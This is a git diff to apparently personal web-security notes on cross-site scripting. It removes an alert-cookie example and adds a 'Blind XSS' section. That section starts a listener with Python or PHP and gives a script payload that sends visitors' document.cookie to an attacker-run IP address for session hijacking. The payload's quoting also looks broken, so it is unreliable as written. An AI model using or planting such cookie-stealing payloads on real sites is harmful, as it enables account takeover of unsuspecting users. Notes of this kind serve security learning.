--- a/_posts/notes/web/2021-12-12-xss.md
+++ b/_posts/notes/web/2021-12-12-xss.md
@@ -6,7 +6,7 @@ permalink: /notes/web/xss/
 ---
 
 
-# [](#header-4)Cross-site script
+# [](#header-4)General
 
 If we have a form we can try to insert code, like this:
 {% highlight plain %}
@@ -20,10 +20,19 @@ There are some examples:
 {% endhighlight %}
 This will send the target to a different page (phishing).
 
-{% highlight plain %}
-<script> alert(document.cookie) </script>
-{% endhighlight %}
-This will show the user's cookie, it can be send to the intruder. It will lead to a session hijacking.
-
 Also, if we use **deface** we can send a visitor to another part of the webpage. This can break the whole page.
 
+# [](#header-4)Blind XSS
+We can use XSS to a cookie hijacking. First we need to start an http server, we can do it with python...:
+{% highlight plain %}
+> python -m http.server 80
+{% endhighlight %}
+or php...:
+{% highlight plain %}
+> php -S 0.0.0.0:80
+{% endhighlight %}
+
+Then we send others cookie to our http server:
+{% highlight plain %}
+<script>document.write('<img src="http://192.168.0.2:80/xss.png?cookie='+ document.cookie + "')</script>
+{% endhighlight %}
